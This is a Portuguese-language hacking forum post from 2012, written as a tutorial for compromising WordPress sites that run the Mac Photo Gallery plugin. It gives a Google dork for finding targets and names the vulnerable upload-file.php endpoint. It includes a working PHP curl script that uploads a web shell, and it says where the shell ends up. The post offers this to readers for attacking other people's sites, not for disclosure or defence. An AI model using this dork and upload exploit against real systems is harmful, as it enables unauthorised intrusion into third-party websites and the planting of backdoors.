Nylon Tecnologia
Mudamos para um dominio proprio.

Acesse nosso novo forum.

http://crawlersnetwork.com/

[Tutorial] Exploit WP (Plugin MacPhoto)

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

[Tutorial] Exploit WP (Plugin MacPhoto)

Mensagem por n3tt3rz em Sex Ago 10, 2012 9:40 am

Olha eu aqui denovo Very Happy
Agora é um exploit pra tu upar shell em wordpress com o plugin Mac Photo Gallery instalado
é bem simples não tem erro esse.

Tu vai la no google e digita
inurl:wp-content/plugins/mac-dock-gallery/


Beleza após isso vai aparecer o teu alvo e a foto
dai tu adiciona isso
[b]inurl:wp-content/plugins/mac-dock-gallery/upload-file.php

Se tiver essa página é porque o site WP está VULL
No upload-file adicione esse script

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/mac-dock-gallery/upload-file.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$u",
'albumId'=>"1",
'mode'=>"image"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>


Beleza a shell vai ser upada.
Ela se encontrará aqui ó
wp-content/uploads/mac-dock-gallery/
shell.php





Não se esqueça clique no
+
avatar
n3tt3rz
Membro

Mensagens : 61
Pontos : 3959
Reputação : 20
Data de inscrição : 09/08/2012
Idade : 21
Localização : /var/www

Ver perfil do usuário http://hacker.umforum.net

Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum